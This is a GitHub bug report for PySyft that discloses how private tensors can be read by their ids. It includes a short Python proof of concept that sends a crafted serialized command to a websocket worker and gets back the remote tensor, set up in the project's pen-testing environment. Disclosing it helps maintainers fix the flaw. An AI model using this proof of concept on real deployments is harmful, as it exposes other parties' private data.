Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Private tensor disclosure #2432

Closed
youben11 opened this issue Aug 1, 2019 · 0 comments

Comments

@youben11
Copy link
Member

@youben11 youben11 commented Aug 1, 2019

Describe the bug
Private tensors can be disclosed using their ids, either with prior knowledge or bruteforce.

PoC

  1. Prepare the environment as described here https://github.com/OpenMined/PySyft/tree/dev/examples/pen_testing/
  2. Define the following functions to be used to steal the remote tensors
from syft import codes
import binascii

def command_msg(cname, oid, args: list, kwargs: dict) -> tuple:
    mtype = codes.MSGTYPE.CMD
    msg = (mtype, ((cname, oid, args, kwargs), []))
    return msg

def send_command(ws_client, message):
    serialized_message = sy.serde.serialize(message)
    ws_client.ws.send(str(binascii.hexlify(serialized_message)))
    response = ws_client.ws.recv()
    response = binascii.unhexlify(response[2:-1])
    return sy.serde.deserialize(response)

msg = command_msg('__str__', 1, [], {})

You can then send this message to any WebsocketClientWorker and get the remote tensor

Expected behavior

The execute_command from https://github.com/OpenMined/PySyft/blob/dev/syft/workers/base.py shouldn't allow this kind of usage.

Screenshots
I've changed the tensors myself to [73, 53, 1, 1, 1] in the run_websocket_server.py

Screenshot_2019-08-01 Challenge Setup

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
1 participant
You can’t perform that action at this time.